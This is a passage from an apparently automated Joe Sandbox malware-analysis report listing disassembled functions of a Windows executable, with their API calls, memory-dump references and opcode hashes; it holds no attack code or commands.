                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfile$SectionWrite$String
                                                      • String ID:
                                                      • API String ID: 2832842796-0
                                                      • Opcode ID: d2e80cf4f555bc11bf0e97ae9502f4df31988aa1003158cc9ec091d77f3fa52f
                                                      • Instruction ID: 1a11988bc720e4ccee7313430f8acc97c8bf197bf4c2a612a04307979dc02632
                                                      • Opcode Fuzzy Hash: d2e80cf4f555bc11bf0e97ae9502f4df31988aa1003158cc9ec091d77f3fa52f
                                                      • Instruction Fuzzy Hash: AE514975A00218AFCB14DF65C884E6ABBF5FF49314F089458E849AB362CB31ED51CF91
                                                      APIs
                                                      • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00EB8F40
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00EB8FD0
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00EB8FEC
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00EB9032
                                                      • FreeLibrary.KERNEL32(00000000), ref: 00EB9052
                                                        • Part of subcall function 00E4F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00EA1043,?,7644E610), ref: 00E4F6E6
                                                        • Part of subcall function 00E4F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00E8FA64,00000000,00000000,?,?,00EA1043,?,7644E610,?,00E8FA64), ref: 00E4F70D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                      • String ID:
                                                      • API String ID: 666041331-0
                                                      • Opcode ID: 97b97476e075fca143f826e6743bacb20a2db58a8eb6de71565eab79c5bbbb69
                                                      • Instruction ID: 2e937d9fd8c961c1e7645a8d4689e10d6c821ad03d4c45552f7e285e99b2a0ca
                                                      • Opcode Fuzzy Hash: 97b97476e075fca143f826e6743bacb20a2db58a8eb6de71565eab79c5bbbb69
                                                      • Instruction Fuzzy Hash: 88512835605205DFCB15EF54C4948EABBF5FF49314F0990A8E90AAB362DB31ED86CB90
                                                      APIs
                                                      • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00EC6C33
                                                      • SetWindowLongW.USER32(?,000000EC,?), ref: 00EC6C4A
                                                      • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00EC6C73
                                                      • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00EAAB79,00000000,00000000), ref: 00EC6C98
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00EC6CC7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Window$Long$MessageSendShow
                                                      • String ID:
                                                      • API String ID: 3688381893-0
                                                      • Opcode ID: c4e92d4ca97db8eeacfa95495369b9e2ee6a91c271c1495134fd0601fa80c60a
                                                      • Instruction ID: 547cd3be15ab579186e7a30316a963eb46f30f7ed59f709b07126bd5ab9fe5de
                                                      • Opcode Fuzzy Hash: c4e92d4ca97db8eeacfa95495369b9e2ee6a91c271c1495134fd0601fa80c60a
                                                      • Instruction Fuzzy Hash: A741D635604104AFDB24CF28CE58FA7BBA5EB49354F14122CF999B72E1C372ED42DA40
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: bd4ae5bc35e9d118c4aa2d4bc946a8e60bc108f513104e99a80a1311ec558f83
                                                      • Instruction ID: c5a9ddc30dbf762efe3806c6249b54cae67f48248cc9d690134432bba6d203f3
                                                      • Opcode Fuzzy Hash: bd4ae5bc35e9d118c4aa2d4bc946a8e60bc108f513104e99a80a1311ec558f83
                                                      • Instruction Fuzzy Hash: 4C410232A406009FCB24DF78D980A6EB3E5EF89354F2555ACEA05FB391DA31AD01CB81
                                                      APIs
                                                      • GetCursorPos.USER32(?), ref: 00E49141
                                                      • ScreenToClient.USER32(00000000,?), ref: 00E4915E
                                                      • GetAsyncKeyState.USER32(00000001), ref: 00E49183
                                                      • GetAsyncKeyState.USER32(00000002), ref: 00E4919D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: AsyncState$ClientCursorScreen
                                                      • String ID:
                                                      • API String ID: 4210589936-0
                                                      • Opcode ID: 25e2ab9bdb05383872044db8e9c10201287e22e3f80818fd1e7f9c6012f330df
                                                      • Instruction ID: 23e828d507eaa685c20cb270460953ff6a235f3c6ebacbac937aa982bb70db77
                                                      • Opcode Fuzzy Hash: 25e2ab9bdb05383872044db8e9c10201287e22e3f80818fd1e7f9c6012f330df
                                                      • Instruction Fuzzy Hash: 0041703190951ABBDF05AF64D848BEEB774FB05324F205229E46DB32D1C731A954CB51
                                                      APIs
                                                      • GetInputState.USER32 ref: 00EA38CB
                                                      • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00EA3922
                                                      • TranslateMessage.USER32(?), ref: 00EA394B
                                                      • DispatchMessageW.USER32(?), ref: 00EA3955
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EA3966
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                      • String ID:
                                                      • API String ID: 2256411358-0
                                                      • Opcode ID: 4e605091f87d6c568740ae1a305af96f30646cfe6dfbbc3f2e53e2c947d16320
                                                      • Instruction ID: 90f79a4a046806504f44c54c48407e7f04c57d4d1787cfecd4ccbecd159ff2a2
                                                      • Opcode Fuzzy Hash: 4e605091f87d6c568740ae1a305af96f30646cfe6dfbbc3f2e53e2c947d16320
                                                      • Instruction Fuzzy Hash: B031F5709043459EEB34CB349808BB73BE8BB4A308F145569F456AA0E4E3B4B689DB11
                                                      APIs
                                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00EAC21E,00000000), ref: 00EACF38
                                                      • InternetReadFile.WININET(?,00000000,?,?), ref: 00EACF6F
                                                      • GetLastError.KERNEL32(?,00000000,?,?,?,00EAC21E,00000000), ref: 00EACFB4
                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,00EAC21E,00000000), ref: 00EACFC8
                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,00EAC21E,00000000), ref: 00EACFF2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                      • String ID:
                                                      • API String ID: 3191363074-0
                                                      • Opcode ID: 6341edb137fe2ffd366cf356c5325aa1d08575d061e2252df1af149bdec78829
                                                      • Instruction ID: 5a2bf343e7d7f7d92f053a49ff3aa4adf7c9df513de03b505368eca5679bfd5e
                                                      • Opcode Fuzzy Hash: 6341edb137fe2ffd366cf356c5325aa1d08575d061e2252df1af149bdec78829
                                                      • Instruction Fuzzy Hash: 4D317F75604205AFDB20DFA5D884EABBBF9EB09314B20542EF506F6110DB30BD45DB60
                                                      APIs
                                                      • GetWindowRect.USER32(?,?), ref: 00E91915
                                                      • PostMessageW.USER32(00000001,00000201,00000001), ref: 00E919C1
                                                      • Sleep.KERNEL32(00000000,?,?,?), ref: 00E919C9
                                                      • PostMessageW.USER32(00000001,00000202,00000000), ref: 00E919DA
                                                      • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00E919E2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessagePostSleep$RectWindow
                                                      • String ID:
                                                      • API String ID: 3382505437-0
                                                      • Opcode ID: 533f2d1b556be7061dfe7b6aa8462b87f30221ed49fda914e772afd691a739ab
                                                      • Instruction ID: 1b7ad89f5c07c91f55d284fa6c818b1927526a98b3a56a68e723b75b3654349d
                                                      • Opcode Fuzzy Hash: 533f2d1b556be7061dfe7b6aa8462b87f30221ed49fda914e772afd691a739ab
                                                      • Instruction Fuzzy Hash: 3A31DF71A0021AEFCF00CFA8CD98ADE3BB5EB44318F105269F925B72D0C3709944CB91
                                                      APIs
                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00EC5745
                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00EC579D
                                                      • _wcslen.LIBCMT ref: 00EC57AF
                                                      • _wcslen.LIBCMT ref: 00EC57BA
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00EC5816
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$_wcslen
                                                      • String ID:
                                                      • API String ID: 763830540-0
                                                      • Opcode ID: 48f842a36773e3239a30ceafc76634794a7c64f905f3b8f0673f7796637d695f
                                                      • Instruction ID: ab2fffa3a8a20bc8681982c3ecb409b7d4d56f14348a31503b10587e63f94a95
                                                      • Opcode Fuzzy Hash: 48f842a36773e3239a30ceafc76634794a7c64f905f3b8f0673f7796637d695f
                                                      • Instruction Fuzzy Hash: A4218172904618DADB208F60CD85FEE77B8FF44724F10925AF929BA180D771A9C6CF51
                                                      APIs
                                                      • IsWindow.USER32(00000000), ref: 00EB0951
                                                      • GetForegroundWindow.USER32 ref: 00EB0968
                                                      • GetDC.USER32(00000000), ref: 00EB09A4
                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 00EB09B0
                                                      • ReleaseDC.USER32(00000000,00000003), ref: 00EB09E8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Window$ForegroundPixelRelease
                                                      • String ID:
                                                      • API String ID: 4156661090-0
                                                      • Opcode ID: c633499292efdc52f6074809cf3627eb75e5df315a31c9f9eb136a141bad6491
                                                      • Instruction ID: aa9bbb73be0c70f1faf03835e2d794a13853ef15ba2727664aaa5483d6b92991
                                                      • Opcode Fuzzy Hash: c633499292efdc52f6074809cf3627eb75e5df315a31c9f9eb136a141bad6491
                                                      • Instruction Fuzzy Hash: CE216F35600204AFD704EF65C988EAFBBE9EF89740F149079E84AB7752CB30AC05CB90
                                                      APIs
                                                      • GetEnvironmentStringsW.KERNEL32 ref: 00E6CDC6
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E6CDE9
                                                        • Part of subcall function 00E63820: RtlAllocateHeap.NTDLL(00000000,?,00F01444,?,00E4FDF5,?,?,00E3A976,00000010,00F01440,00E313FC,?,00E313C6,?,00E31129), ref: 00E63852
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00E6CE0F
                                                      • _free.LIBCMT ref: 00E6CE22
                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00E6CE31
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                      • String ID:
                                                      • API String ID: 336800556-0
                                                      • Opcode ID: 70b5d50826eedb4d7c6afe0b17895260fdacbb078a184c7d73e8f1f657e9d0f4
                                                      • Instruction ID: 537d7a2408668f765f30653b4ac10cf553174111e1907340c0b434ae0dca6260
                                                      • Opcode Fuzzy Hash: 70b5d50826eedb4d7c6afe0b17895260fdacbb078a184c7d73e8f1f657e9d0f4
                                                      • Instruction Fuzzy Hash: D401D472A422157F232116BB7C8CC7B7A7DDFC6BE53351129F909F7200EA668D0281B0
                                                      APIs
                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E49693
                                                      • SelectObject.GDI32(?,00000000), ref: 00E496A2
                                                      • BeginPath.GDI32(?), ref: 00E496B9
                                                      • SelectObject.GDI32(?,00000000), ref: 00E496E2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ObjectSelect$BeginCreatePath
                                                      • String ID:
                                                      • API String ID: 3225163088-0
                                                      • Opcode ID: 07bae1241627723048c0edca0718d018ef190bde9d92199ed93d88e6477e153d
                                                      • Instruction ID: dbd0dd7fc30f65ace4cc592a9737ed60767821a2878bb59aaffea028c4603b61
                                                      • Opcode Fuzzy Hash: 07bae1241627723048c0edca0718d018ef190bde9d92199ed93d88e6477e153d
                                                      • Instruction Fuzzy Hash: 5821A730802309EFDB119F25FC08BAA3BB4BB50359F210256F418B61B1D3719856DF90
                                                      APIs
                                                      • GetSysColor.USER32(00000008), ref: 00E498CC
                                                      • SetTextColor.GDI32(?,?), ref: 00E498D6
                                                      • SetBkMode.GDI32(?,00000001), ref: 00E498E9
                                                      • GetStockObject.GDI32(00000005), ref: 00E498F1
                                                      • GetWindowLongW.USER32(?,000000EB), ref: 00E49952
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Color$LongModeObjectStockTextWindow
                                                      • String ID:
                                                      • API String ID: 1860813098-0
                                                      • Opcode ID: 6d14e69f22affd0d4c3ac4242c487b6e172310605592808dd71a88a06b1bd912
                                                      • Instruction ID: 748b88403f6df9f303209ee04e9c6f49ecb1e9ea2fc0161ea14cd2a78687a1f5
                                                      • Opcode Fuzzy Hash: 6d14e69f22affd0d4c3ac4242c487b6e172310605592808dd71a88a06b1bd912
                                                      • Instruction Fuzzy Hash: CA213A325462109FCB258F26FC54EEB3B60AB96335B28025DF6A67A1E3C7324851DB50
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _memcmp
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,?,00E5F2DE,00E63863,00F01444,?,00E4FDF5,?,?,00E3A976,00000010,00F01440,00E313FC,?,00E313C6), ref: 00E62DFD
                                                      • _free.LIBCMT ref: 00E62E32
                                                      • _free.LIBCMT ref: 00E62E59
                                                      • SetLastError.KERNEL32(00000000,00E31129), ref: 00E62E66
                                                      • SetLastError.KERNEL32(00000000,00E31129), ref: 00E62E6F
                                                      Similarity
                                                      • API ID: ErrorLast$_free
                                                      APIs
                                                      • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E8FF41,80070057,?,?,?,00E9035E), ref: 00E9002B
                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E8FF41,80070057,?,?), ref: 00E90046
                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E8FF41,80070057,?,?), ref: 00E90054
                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E8FF41,80070057,?), ref: 00E90064
                                                      • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E8FF41,80070057,?,?), ref: 00E90070
                                                      Similarity
                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                      APIs
                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00E9E997
                                                      • QueryPerformanceFrequency.KERNEL32(?), ref: 00E9E9A5
                                                      • Sleep.KERNEL32(00000000), ref: 00E9E9AD
                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00E9E9B7
                                                      • Sleep.KERNEL32 ref: 00E9E9F3
                                                      Similarity
                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                      APIs
                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E91114
                                                      • GetLastError.KERNEL32(?,00000000,00000000,?,?,00E90B9B,?,?,?), ref: 00E91120
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00E90B9B,?,?,?), ref: 00E9112F
                                                      • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00E90B9B,?,?,?), ref: 00E91136
                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E9114D
                                                      Similarity
                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                      APIs
                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E90FCA
                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E90FD6
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E90FE5
                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E90FEC
                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E91002
                                                      Similarity
                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                      APIs
                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E9102A
                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E91036
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E91045
                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E9104C
                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E91062
                                                      Similarity
                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                      APIs
                                                      • CloseHandle.KERNEL32(?,?,?,?,00EA017D,?,00EA32FC,?,00000001,00E72592,?), ref: 00EA0324
                                                      • CloseHandle.KERNEL32(?,?,?,?,00EA017D,?,00EA32FC,?,00000001,00E72592,?), ref: 00EA0331
                                                      • CloseHandle.KERNEL32(?,?,?,?,00EA017D,?,00EA32FC,?,00000001,00E72592,?), ref: 00EA033E
                                                      • CloseHandle.KERNEL32(?,?,?,?,00EA017D,?,00EA32FC,?,00000001,00E72592,?), ref: 00EA034B
                                                      • CloseHandle.KERNEL32(?,?,?,?,00EA017D,?,00EA32FC,?,00000001,00E72592,?), ref: 00EA0358
                                                      • CloseHandle.KERNEL32(?,?,?,?,00EA017D,?,00EA32FC,?,00000001,00E72592,?), ref: 00EA0365
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      APIs
                                                      • _free.LIBCMT ref: 00E6D752
                                                        • Part of subcall function 00E629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00E6D7D1,00000000,00000000,00000000,00000000,?,00E6D7F8,00000000,00000007,00000000,?,00E6DBF5,00000000), ref: 00E629DE
                                                        • Part of subcall function 00E629C8: GetLastError.KERNEL32(00000000,?,00E6D7D1,00000000,00000000,00000000,00000000,?,00E6D7F8,00000000,00000007,00000000,?,00E6DBF5,00000000,00000000), ref: 00E629F0
                                                      • _free.LIBCMT ref: 00E6D764
                                                      • _free.LIBCMT ref: 00E6D776
                                                      • _free.LIBCMT ref: 00E6D788
                                                      • _free.LIBCMT ref: 00E6D79A
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003E9), ref: 00E95C58
                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00E95C6F
                                                      • MessageBeep.USER32(00000000), ref: 00E95C87
                                                      • KillTimer.USER32(?,0000040A), ref: 00E95CA3
                                                      • EndDialog.USER32(?,00000001), ref: 00E95CBD
                                                      Similarity
                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                      APIs
                                                      • _free.LIBCMT ref: 00E622BE
                                                        • Part of subcall function 00E629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00E6D7D1,00000000,00000000,00000000,00000000,?,00E6D7F8,00000000,00000007,00000000,?,00E6DBF5,00000000), ref: 00E629DE
                                                        • Part of subcall function 00E629C8: GetLastError.KERNEL32(00000000,?,00E6D7D1,00000000,00000000,00000000,00000000,?,00E6D7F8,00000000,00000007,00000000,?,00E6DBF5,00000000,00000000), ref: 00E629F0
